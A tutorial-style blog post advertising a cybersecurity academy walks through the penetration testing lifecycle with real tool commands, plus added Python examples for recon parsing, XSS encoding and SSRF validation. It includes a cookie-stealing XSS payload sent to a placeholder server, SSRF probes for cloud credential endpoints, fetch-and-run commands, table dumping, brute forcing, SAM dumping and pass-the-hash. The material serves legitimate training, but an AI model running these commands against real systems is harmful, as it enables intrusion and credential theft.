Ethical hacking is no longer a niche skill reserved for government contractors and elite red teams. Organizations of every size are actively hiring penetration testers, bug bounty hunters, and offensive security professionals to find vulnerabilities before attackers do. If you want to build a career breaking things legally, this guide is your starting point.
This post walks through the full ethical hacking lifecycle: reconnaissance, scanning, exploitation, post-exploitation, and reporting. Each section includes real-world commands and tool usage so you can follow along in a lab environment rather than just read theory.
Ethical hacking is the authorized practice of probing computer systems, networks, and applications to discover security weaknesses. The word "ethical" is doing real work here. Everything described in professional penetration testing hinges on written authorization. Without a signed scope agreement that names the systems in scope, the testing window, and the permitted techniques, the same actions that earn a penetration tester a paycheck can result in criminal charges under the U.S. Computer Fraud and Abuse Act or its international equivalents.
Companies rely on ethical hackers because automated scanners miss context. A scanner might flag an outdated Apache version without understanding that the version is exposed to the public internet, accepts unauthenticated requests, and sits adjacent to a database server holding customer records. A skilled tester connects those dots and communicates actual business risk, not just a CVE number.
The global demand for offensive security talent continues to outpace supply. ISC2 and multiple industry reports consistently show hundreds of thousands of unfilled cybersecurity positions, with penetration testers and red team operators commanding salaries well above the industry average.
Professional engagements follow a structured methodology. Ad hoc testing produces inconsistent results and creates legal exposure. The phases below mirror how mature red teams and penetration testing firms approach real engagements.
Reconnaissance is divided into passive and active stages. Passive recon gathers information from third parties (search engines, certificate logs, passive DNS datasets) without sending a single packet to the target's infrastructure. Active recon sends traffic to the target itself, such as DNS brute forcing against its name servers, which the target can detect and log.
Passive Recon with theHarvester
theHarvester aggregates email addresses, subdomains, hosts, and IP addresses from public sources including search engines, certificate transparency logs, and passive DNS datasets. -b selects the sources, -l caps the number of results pulled per source, and -f writes the results to report files under the given name.
theHarvester -d targetcorp.com -b google,bing,crtsh,dnsdumpster -l 500 -f recon_output
Subdomain Enumeration with Amass
Amass is the de facto standard for deep subdomain enumeration. The enum subcommand's -passive option queries dozens of third-party data sources without sending traffic to the target; the -active run below adds DNS brute forcing and resolution, which the target's name servers will see.
amass enum -passive -d targetcorp.com -o passive_subs.txt
amass enum -active -d targetcorp.com -brute -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -o active_subs.txt
Certificate Transparency with crt.sh
Certificate transparency logs expose subdomains that DNS enumeration misses, because every publicly trusted certificate is logged regardless of whether the name was ever meant to be discoverable. You can query crt.sh directly from the command line (%25 is the URL-encoded % wildcard; note that a single name_value entry may contain several SAN names separated by newlines and may start with *., so the raw output still needs normalising before you use it):
curl -s "https://crt.sh/?q=%25.targetcorp.com&output=json" | jq -r '.[].name_value' | sort -u
At this stage, you are building an attack surface map: all the externally visible assets associated with the target organization. This phase is where many testers underinvest, and it shows in the quality of their final reports. If you want to develop a systematic approach to recon and OSINT, Redfox Cybersecurity Academy offers hands-on courses that take you from surface-level Google dorking to deep infrastructure mapping.
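The merge step that turns the crt.sh JSON and the Amass host list into one de-duplicated, in-scope attack surface list, as an added example that is not part of the original post. It handles the two things the raw jq one-liner does not: name_value entries carrying several newline-separated SANs or a leading wildcard, and look-alike domains that merely contain the target name. The crt.sh response, the Amass lines and the root domain targetcorp.com are all constructed sample data.

```python
"""Merge subdomain candidates from crt.sh JSON and enumerator output into one
in-scope attack-surface list. Added example; all sample data below is constructed."""
import json
import re

SCOPE_DOMAIN = "targetcorp.com"  # assumed in-scope root domain (placeholder)

# Constructed crt.sh-style response: name_value may hold several SANs joined by "\n"
# and wildcard entries, which is why the raw `jq '.[].name_value'` output needs cleanup.
CRTSH_SAMPLE = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt", "name_value": "www.targetcorp.com\ntargetcorp.com"},
    {"issuer_name": "C=US, O=Let's Encrypt", "name_value": "*.dev.targetcorp.com"},
    {"issuer_name": "C=US, O=DigiCert", "name_value": "VPN.TargetCorp.com"},
    {"issuer_name": "C=US, O=DigiCert", "name_value": "targetcorp.com.evil-lookalike.net"},
])

# Constructed lines in the shape `amass enum -o` writes: one hostname per line
AMASS_SAMPLE = """mail.targetcorp.com
www.targetcorp.com
staging.targetcorp.com
"""

# Two or more DNS labels, letters/digits/hyphens only, no leading or trailing hyphen
HOSTNAME_RE = re.compile(
    r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+$"
)


def in_scope(host, root=SCOPE_DOMAIN):
    """True only for the root itself or a real subdomain of it (suffix match on a dot boundary),
    so 'targetcorp.com.evil-lookalike.net' is rejected even though it contains the root."""
    return host == root or host.endswith("." + root)


def normalize(name):
    """Lowercase, strip whitespace and a leading wildcard label; None if not a hostname."""
    name = name.strip().lower()
    if name.startswith("*."):
        name = name[2:]
    return name if HOSTNAME_RE.match(name) else None


def hosts_from_crtsh(raw_json):
    """Split each name_value on newlines, normalise, keep in-scope names only."""
    out = set()
    for entry in json.loads(raw_json):
        for name in entry["name_value"].split("\n"):
            host = normalize(name)
            if host and in_scope(host):
                out.add(host)
    return out


def hosts_from_lines(text):
    """Same filtering for a plain one-host-per-line file."""
    return {h for h in (normalize(line) for line in text.splitlines()) if h and in_scope(h)}


def attack_surface(crtsh_json, amass_text):
    """Union of both sources, sorted, ready to feed into the scanning phase."""
    return sorted(hosts_from_crtsh(crtsh_json) | hosts_from_lines(amass_text))


if __name__ == "__main__":
    for host in attack_surface(CRTSH_SAMPLE, AMASS_SAMPLE):
        print(host)
```

Feed the merged list to the active scans only after the client has confirmed each name is theirs; certificate logs regularly surface hosts on third-party infrastructure (SaaS tenants, CDNs) that are outside the authorised scope even though they sit under the target's domain.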
Once you have a list of targets, you move into active scanning. The goal is to identify open ports, running services, software versions, and potential misconfigurations.
Port Scanning with Nmap
A structured Nmap workflow produces more reliable results than running a single all-ports scan.
# Fast initial scan to identify open ports
nmap -T4 --open -p- 10.10.10.50 -oG fast_scan.txt
# Service and version detection on the ports found above (-O needs root for OS fingerprinting)
nmap -sV -sC -p 22,80,443,8080,3306 -O 10.10.10.50 -oN detailed_scan.txt
# Vulnerability script scan
nmap --script vuln -p 22,80,443 10.10.10.50 -oN vuln_scan.txt
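The glue between the first and second scan above, as an added example rather than code from the original post: parse the greppable (-oG) output of the fast all-ports scan, keep only ports in the open state, and emit the targeted -sV -sC command per host. The gnmap text embedded below is constructed to match the layout nmap writes; host addresses are placeholders.

```python
"""Parse nmap greppable (-oG) output and build the -p list for the follow-up -sV/-sC scan.
Added example, not from the original page; the gnmap text below is constructed."""
import re

# Constructed in the layout nmap -oG writes: one "Host:" line per target, a tab-separated
# "Ports:" field, each entry as port/state/proto/owner/service/rpc/version.
GNMAP_SAMPLE = """# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -T4 --open -p- 10.10.10.50 -oG fast_scan.txt
Host: 10.10.10.50 ()\tStatus: Up
Host: 10.10.10.50 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///, 8080/filtered/tcp//http-proxy///\tIgnored State: closed (65531)
Host: 10.10.10.51 ()\tPorts: 3306/open/tcp//mysql///\tIgnored State: closed (65534)
# Nmap done at Mon Jan  1 00:01:00 2024 -- 2 IP addresses (2 hosts up) scanned in 60.00 seconds
"""

# port / state / protocol, the first three of the seven slash-separated fields
PORT_ENTRY = re.compile(r"(\d+)/(\w+)/(tcp|udp)/")


def open_ports(gnmap_text):
    """Return {host: [open ports]} in scan order; filtered and closed entries are dropped."""
    result = {}
    for line in gnmap_text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comments and the "Status: Up" line carry no port data
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        ports = [int(p) for p, state, _proto in PORT_ENTRY.findall(ports_field) if state == "open"]
        if ports:
            result[host] = ports
    return result


def port_spec(ports):
    """Join ports into the comma-separated form nmap -p accepts."""
    return ",".join(str(p) for p in ports)


def followup_commands(gnmap_text, output_prefix="detailed"):
    """One -sV -sC -O command per host, limited to that host's open ports."""
    return [
        f"nmap -sV -sC -O -p {port_spec(ports)} {host} -oN {output_prefix}_{host}.txt"
        for host, ports in open_ports(gnmap_text).items()
    ]


if __name__ == "__main__":
    for cmd in followup_commands(GNMAP_SAMPLE):
        print(cmd)
```

Note that filtered ports (8080 in the sample) are deliberately left out of the second scan; if the engagement cares about them, scan them separately with a slower timing template so the results are not polluted by dropped probes.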
Web Application Fingerprinting with WhatWeb
whatweb -a 3 https://targetcorp.com -v
Directory and File Enumeration with Feroxbuster
Feroxbuster performs recursive content discovery and, being a multithreaded Rust tool, is considerably faster than the older Java and Perl scanners. -x appends the listed extensions to every word, -t sets the number of concurrent requests, and each discovered directory is automatically queued for a further pass. Keep the thread count within whatever rate the client agreed to; 50 concurrent requests against a small production host can itself become an availability incident.
feroxbuster -u https://targetcorp.com -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt -x php,html,txt,bak -t 50 -o ferox_output.txt
Scanning tells you what is running. Vulnerability analysis tells you whether what is running can be exploited. This phase involves combining automated scanning output with manual research.
Web Vulnerability Scanning with Nikto
nikto -h https://targetcorp.com -ssl -output nikto_report.txt
SQL Injection Testing with SQLMap
SQLMap automates detection and exploitation of SQL injection vulnerabilities across a wide range of database backends. --batch accepts the default answer to every prompt, which suits scripted runs. The database and table names below are examples; the first command enumerates what actually exists. Dumping a table of customer records (the last command) is only appropriate when the rules of engagement explicitly permit it; otherwise stop once read access is proven and record the evidence.
# Test a URL parameter for injection
sqlmap -u "https://targetcorp.com/product?id=5" --dbs --batch
# List the tables in a specific database
sqlmap -u "https://targetcorp.com/product?id=5" -D customers_db --tables --batch
# Dump a specific table
sqlmap -u "https://targetcorp.com/product?id=5" -D customers_db -T users --dump --batch
Nuclei for Template-Based Vulnerability Scanning
Nuclei is a community-driven vulnerability scanner that runs structured YAML templates against targets. It covers CVEs, misconfigurations, exposed panels, and more.
# Update templates
nuclei -update-templates
# Scan with severity filter
nuclei -u https://targetcorp.com -severity medium,high,critical -o nuclei_results.txt
# Scan with specific tags
nuclei -u https://targetcorp.com -tags cve,exposure,misconfig -o nuclei_tagged.txt
If vulnerability analysis is an area you want to go deeper on, particularly around web applications, Redfox Cybersecurity Academy's Web Application Penetration Testing course covers injection attacks, authentication bypasses, and business logic flaws with lab-driven exercises built on intentionally vulnerable applications.
Exploitation is where authorized access is actually obtained. This phase requires careful documentation. Every command run, every payload delivered, and every system accessed must be logged with timestamps for the final report.
Cross-Site Scripting (XSS) Payload Testing
XSS remains one of the most consistently found vulnerabilities in web applications. Each probe below targets a different injection context, so match the payload to where the input is reflected; alert(document.domain) rather than alert(1) also records which origin the script executed in.
// HTML body context: does the input land unencoded inside the page?
<script>alert(document.domain)</script>
// Cookie exfiltration payload (authorized testing only; the collaborator host is a placeholder). Only session cookies without the HttpOnly flag are readable from script
<script>document.location='https://your-collaborator-server.com/steal?c='+document.cookie</script>
// JavaScript string context: closes a single-quoted string literal and concatenates alert() as code
'-alert(1)-'
// Attribute context: closes the quoted attribute and its tag, then injects an element with an event handler
"><img src=x onerror=alert(document.domain)>
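Why the context matters, shown as an added example rather than code from the original post: three constructed templates reflect user input into the HTML body, a quoted attribute, and a JavaScript string literal, once without encoding and once with encoding appropriate to that context. The probes are the ones listed above; the templates and the breaks_out check are hypothetical stand-ins for a real application's rendering and for manual verification in a browser.

```python
"""Each XSS probe only breaks out of the context it was written for, and context-appropriate
encoding neutralises it. Added example; the templates are constructed stand-ins for a
vulnerable application, not code from the original page."""
import html
import json

PROBES = {
    "html_body": "<script>alert(document.domain)</script>",
    "attribute": '"><img src=x onerror=alert(document.domain)>',
    "js_string": "'-alert(1)-'",
}

# What a successful breakout looks like in each rendered context (crude but deterministic
# check standing in for "open it in a browser and see if alert() fires")
BREAKOUT_MARKERS = {
    "html_body": "<script>",          # a new script element appeared in the body
    "attribute": "<img",              # the attribute and tag were closed, a new element injected
    "js_string": "''-alert(1)-''",    # the quote ended the literal; alert(1) is now code
}


def render_unsafe(context, value):
    """Constructed vulnerable templates: raw string concatenation into each context."""
    if context == "html_body":
        return f"<p>Results for {value}</p>"
    if context == "attribute":
        return f'<input type="text" value="{value}">'
    if context == "js_string":
        return f"<script>var q = '{value}';</script>"
    raise ValueError(context)


def render_safe(context, value):
    """Same templates with encoding chosen per context."""
    if context == "html_body":
        return f"<p>Results for {html.escape(value)}</p>"
    if context == "attribute":
        # quote=True also encodes the double quote that closes the attribute
        return f'<input type="text" value="{html.escape(value, quote=True)}">'
    if context == "js_string":
        # json.dumps yields a valid JS string literal; "<" is additionally escaped so a
        # literal "</script>" inside the data cannot terminate the script element
        literal = json.dumps(value).replace("<", "\\u003c")
        return f"<script>var q = {literal};</script>"
    raise ValueError(context)


def breaks_out(context, rendered):
    return BREAKOUT_MARKERS[context] in rendered


def evaluate(context):
    """{'unsafe': did the probe break out of the raw template, 'safe': ... of the encoded one}"""
    probe = PROBES[context]
    return {
        "unsafe": breaks_out(context, render_unsafe(context, probe)),
        "safe": breaks_out(context, render_safe(context, probe)),
    }


if __name__ == "__main__":
    for ctx in PROBES:
        print(ctx, evaluate(ctx))
        print("  ", render_unsafe(ctx, PROBES[ctx]))
        print("  ", render_safe(ctx, PROBES[ctx]))
```

The practical lesson for testing is the same as for fixing: a body-context payload that is reflected inside an attribute will not fire, so a negative result with one probe says nothing about the other contexts.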
SSRF (Server-Side Request Forgery) Testing
SSRF vulnerabilities allow attackers to make the server issue requests on their behalf, often to internal services.
# Using Burp Collaborator or interactsh for out-of-band detection
curl -X POST "https://targetcorp.com/api/fetch" \
-H "Content-Type: application/json" \
-d '{"url": "https://your-interactsh-server.com/ssrf-test"}'
# Targeting cloud metadata endpoints (common high-impact SSRF)
# In the request body, attempt:
# http://169.254.169.254/latest/meta-data/iam/security-credentials/
#   (AWS; if IMDSv2 is enforced the service first needs a PUT to obtain a session token and then
#    an X-aws-ec2-metadata-token header, so a GET-only SSRF that cannot set headers will be refused)
# http://metadata.google.internal/computeMetadata/v1/
#   (GCP; responses require the Metadata-Flavor: Google request header, so again a URL-only SSRF
#    without header control gets a 403; a 403 here still confirms the server can reach the endpoint)
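The server-side counterpart of the probe above, added here as an example and not taken from the original post: the SSRF-prone shape fetches whatever URL the client supplied, while the hardened version parses the URL, resolves the host, and refuses any destination that is loopback, private, link-local (where the metadata services live) or otherwise non-routable. The resolver table and the http_get callback are constructed so the code runs offline; the hostnames and addresses in it are placeholders.

```python
"""URL validation against SSRF: vulnerable shape beside a hardened one. Added example, not
code from the original page; FAKE_DNS stands in for socket.getaddrinfo() so it runs offline."""
import ipaddress
from urllib.parse import urlparse

# Constructed DNS answers (placeholders, not real hosts)
FAKE_DNS = {
    "api.partner.example": ["93.184.216.34"],
    "metadata.google.internal": ["169.254.169.254"],
    "internal-wiki.corp": ["10.0.5.20"],
    "rebind.attacker.example": ["93.184.216.34", "127.0.0.1"],  # mixed public/loopback answers
}


def resolve(host):
    return FAKE_DNS.get(host, [])


def is_safe_destination(url, resolver=resolve):
    """Return (ok, reason). Rejects non-http(s) schemes, credentials in the URL, literal IPs in
    non-global ranges, and hostnames for which ANY resolved address is non-global."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "userinfo in URL"
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        addrs = [ipaddress.ip_address(host)]          # literal IP (v4 or bracketed v6)
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        if not addrs:
            return False, "unresolvable host"
    for a in addrs:
        # is_global is False for loopback, RFC1918, link-local (169.254/16), reserved and
        # documentation ranges; multicast is checked separately because it is not "private"
        if not a.is_global or a.is_multicast:
            return False, f"{host} resolves to disallowed address {a}"
    return True, "ok"


def fetch_unsafe(url, http_get):
    """The vulnerable shape: whatever the client sent is fetched server-side."""
    return http_get(url)


def fetch_safe(url, http_get, resolver=resolve):
    """Hardened shape: validate, then fetch. http_get is the application's HTTP client."""
    ok, reason = is_safe_destination(url, resolver)
    if not ok:
        raise ValueError(f"refusing to fetch {url}: {reason}")
    return http_get(url)


if __name__ == "__main__":
    for u in ("https://api.partner.example/data",
              "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
              "http://metadata.google.internal/computeMetadata/v1/",
              "http://rebind.attacker.example/",
              "file:///etc/passwd"):
        print(u, "->", is_safe_destination(u))
```

Two caveats a reviewer would raise against even this version: the check resolves the name once, while the HTTP client resolves it again at connect time, so a rebinding DNS server can pass validation and then answer 127.0.0.1 (the fix is to connect to the validated address and send the Host header yourself), and redirects must be validated hop by hop, since a permitted public host can 302 to the metadata address.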
Password Attacks with Hydra and Hashcat
Network authentication brute-forcing with Hydra. Check the target's lockout policy before starting; -t 4 keeps concurrency low so one test does not lock out every account in the list:
# SSH brute force (-l single username, -P password list, -V shows each attempt)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.50 -t 4 -V
# HTTP POST form attack: path, POST body with ^USER^/^PASS^ placeholders, and the string that marks a FAILED login
hydra -l admin -P passwords.txt 10.10.10.50 http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"
Offline hash cracking with Hashcat:
# Identify hash type first with hashid
hashid '$2y$10$somehashedvalue'
# Crack bcrypt with a wordlist (mode 3200; bcrypt is deliberately slow, so keep the wordlist targeted)
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
# Rule-based attack for NTLM hashes
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
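The "identify the hash type first" step, as an added example that is not code from the original post: a small set of shape-based rules mapping a hash to candidate hashcat modes, plus the LMHASH:NTHASH formatting that Impacket's -hashes option expects in the pass-the-hash command later in this guide. The rules cover only a few common formats (a fraction of what hashid knows), and every sample hash below is a constructed placeholder, not a real credential.

```python
"""Map a hash's shape to hashcat modes and build the crack/PtH arguments. Added example
(not from the page); rules cover a handful of common formats, samples are constructed."""
import re

# (name, hashcat mode, recogniser). A 32-hex value is ambiguous, so both NTLM and MD5 match.
HASH_RULES = [
    ("bcrypt", 3200, re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$")),
    ("sha512crypt", 1800, re.compile(r"^\$6\$[^$]{1,16}\$[./A-Za-z0-9]{86}$")),
    ("md5crypt", 500, re.compile(r"^\$1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$")),
    # user::domain:server-challenge(16 hex):NTProofStr(32 hex):blob, as Responder/ntlmrelayx print it
    ("NetNTLMv2", 5600, re.compile(r"^[^:]+::[^:]*:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]+$")),
    ("NTLM", 1000, re.compile(r"^[0-9a-fA-F]{32}$")),
    ("MD5", 0, re.compile(r"^[0-9a-fA-F]{32}$")),
    ("SHA-256", 1400, re.compile(r"^[0-9a-fA-F]{64}$")),
]

# Constructed placeholders: a syntactically valid bcrypt string, the 32-hex value used on this
# page (it is MD5("hello"), not a recovered NT hash), and a fake NetNTLMv2 capture line.
SAMPLE_BCRYPT = "$2y$10$" + "abcdefghijklmnopqrstuv" + "wxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0"
SAMPLE_NTLM = "5d41402abc4b2a76b9719d911017c592"
SAMPLE_NETNTLMV2 = "jdoe::TARGETCORP:1122334455667788:0123456789abcdef0123456789abcdef:0101000000000000"

# LM hash of an empty password; modern Windows stores no LM hash, so dumps show this value
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def identify(h):
    """All (name, mode) candidates whose shape matches; more than one means 'go and check'."""
    h = h.strip()
    return [(name, mode) for name, mode, rx in HASH_RULES if rx.match(h)]


def hashcat_command(hash_file, mode, wordlist, rule_file=None):
    """Build the hashcat invocation, optionally with a rule file as in the NTLM example above."""
    cmd = f"hashcat -m {mode} {hash_file} {wordlist}"
    return cmd + (f" -r {rule_file}" if rule_file else "")


def impacket_hashes_arg(nt_hash):
    """Impacket's -hashes wants LMHASH:NTHASH. When only the NT hash is known, use the empty-LM
    value (the LM part may also simply be left blank, i.e. ':NTHASH')."""
    if not re.fullmatch(r"[0-9a-fA-F]{32}", nt_hash):
        raise ValueError("NT hash must be 32 hex characters")
    return f"{EMPTY_LM}:{nt_hash.lower()}"


if __name__ == "__main__":
    for sample in (SAMPLE_BCRYPT, SAMPLE_NTLM, SAMPLE_NETNTLMV2):
        print(sample[:40], "->", identify(sample))
    print(hashcat_command("ntlm_hashes.txt", 1000, "rockyou.txt", "best64.rule"))
    print(impacket_hashes_arg(SAMPLE_NTLM))
```

When identify returns both NTLM and MD5, the source of the hash decides: a value pulled from the SAM or ntds.dit is NTLM regardless of what its shape suggests, and cracking it in mode 0 would silently fail.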
Post-exploitation demonstrates the real-world impact of a successful breach. Testers document what an attacker could do with the access they have obtained: data exfiltration, lateral movement, privilege escalation, and persistence.
Linux Privilege Escalation Enumeration with LinPEAS
# Download and run LinPEAS on a compromised Linux host (needs outbound internet from the target;
# on a client engagement, stage tooling from infrastructure you control and log every file dropped)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or transfer and execute
wget http://your-server/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh | tee /tmp/linpeas_output.txt
Windows Privilege Escalation with WinPEAS
# Download and execute WinPEAS on a compromised Windows host
iwr -uri http://your-server/winPEAS.exe -OutFile C:\Windows\Temp\wp.exe
C:\Windows\Temp\wp.exe
Lateral Movement with CrackMapExec
CrackMapExec is a post-exploitation tool for testing Active Directory environments. The original project is no longer maintained; NetExec (invoked as nxc) is its actively developed successor and keeps the same command syntax, so the examples below work unchanged after swapping the binary name.
# Enumerate SMB hosts with valid credentials
crackmapexec smb 10.10.10.0/24 -u administrator -p 'Password123!' --shares
# Dump SAM database remotely
crackmapexec smb 10.10.10.50 -u administrator -p 'Password123!' --sam
# Execute a command across multiple hosts
crackmapexec smb 10.10.10.0/24 -u administrator -p 'Password123!' -x "whoami"
The post-exploitation phase separates checkbox-style assessments from high-value engagements. Being able to clearly demonstrate a path from initial foothold to domain admin, with full documentation, is a skill that takes dedicated lab time to build. The Active Directory penetration testing courses at Redfox Cybersecurity Academy cover this entire attack chain in structured lab environments modeled on real enterprise networks.
Beyond the tools covered above, a working ethical hacker's toolkit includes the following categories:
Proxy and Interception Tools
Burp Suite Professional is the standard for web application testing. Learning to write custom Burp extensions in Java against the Montoya API gives you a significant edge on complex engagements (Python extensions run on Jython through the legacy Extender API, which Montoya has superseded). OWASP ZAP serves as a capable open-source alternative.
Network Analysis
Wireshark for packet capture and protocol analysis. Bettercap for network-level attacks including ARP spoofing, DNS poisoning, and HTTPS downgrade testing in lab environments.
Active Directory and Windows Testing
BloodHound and SharpHound for Active Directory attack path visualization. Impacket for working with Windows protocols including SMB, Kerberos, and DCOM directly from Python scripts.
# Kerberoasting with Impacket
impacket-GetUserSPNs targetcorp.local/jdoe:'Password123!' -dc-ip 10.10.10.1 -request -outputfile spn_hashes.txt
# Pass-the-hash with Impacket's psexec (-hashes takes LMHASH:NTHASH; aad3b435... is the LM hash of an
# empty password, so this is the usual form when only the NT hash was recovered; the NT value is a placeholder)
impacket-psexec administrator@10.10.10.50 -hashes aad3b435b51404eeaad3b435b51404ee:5d41402abc4b2a76b9719d911017c592
Cloud Security Testing
Pacu for AWS penetration testing. Scout Suite for multi-cloud security auditing across AWS, Azure, and GCP.
# Scout Suite AWS audit
python scout.py aws --report-dir ./scout_report
# Pacu session setup
python3 pacu.py
# Inside Pacu:
# import_keys --all
# run iam__enum_permissions
Every technique in this guide should be practiced in an environment you control or have explicit authorization to test. Several platforms make this straightforward.
Hack The Box and TryHackMe offer browser-based labs for practicing penetration testing techniques without any legal risk. Building your own lab using VirtualBox or VMware with intentionally vulnerable machines like Vulnhub VMs, DVWA, or OWASP WebGoat gives you full control over the environment.
For Active Directory lab setup, a basic Windows Server 2019 evaluation license, two Windows 10 virtual machines, and a collection of deliberately misconfigured services gives you a realistic environment to practice domain attacks without any licensing costs beyond time.
Certifications validate skill but they do not replace demonstrated ability. The certifications that carry the most weight in hiring decisions for penetration testing roles are those that require passing a practical exam rather than a multiple-choice test.
Respected certifications in the offensive security space include OSCP (Offensive Security Certified Professional), BSCP (Burp Suite Certified Practitioner) for web application specialists, and eJPT for those earlier in their learning journey.
Bug bounty programs on platforms like HackerOne and Bugcrowd also serve as public proof of skill. A history of valid, high-severity bug reports on well-known programs carries significant weight with hiring managers at security firms.
If you are building toward a penetration testing career and want a structured learning path rather than piecing together YouTube videos and blog posts, Redfox Cybersecurity Academy provides curated courses built by practicing security professionals, covering web application testing, network penetration testing, Active Directory attacks, and more.
Penetration testing without authorization is a criminal offense in most jurisdictions. The following practices protect both you and your clients:
Ethical hacking is a technical discipline that rewards systematic thinking, continuous learning, and careful documentation. The tools and techniques covered here represent the practical foundation of a modern penetration testing engagement, from the first passive recon query to post-exploitation lateral movement across an Active Directory environment.
The field evolves quickly. New vulnerability classes emerge, attack surfaces expand with cloud adoption and IoT proliferation, and defensive tools improve. Staying sharp requires consistent lab practice and engagement with the security research community.
If you are ready to move beyond reading about security concepts and want to build hands-on, job-ready skills, explore the course catalog at Redfox Cybersecurity Academy and find the path that matches where you are in your learning journey today.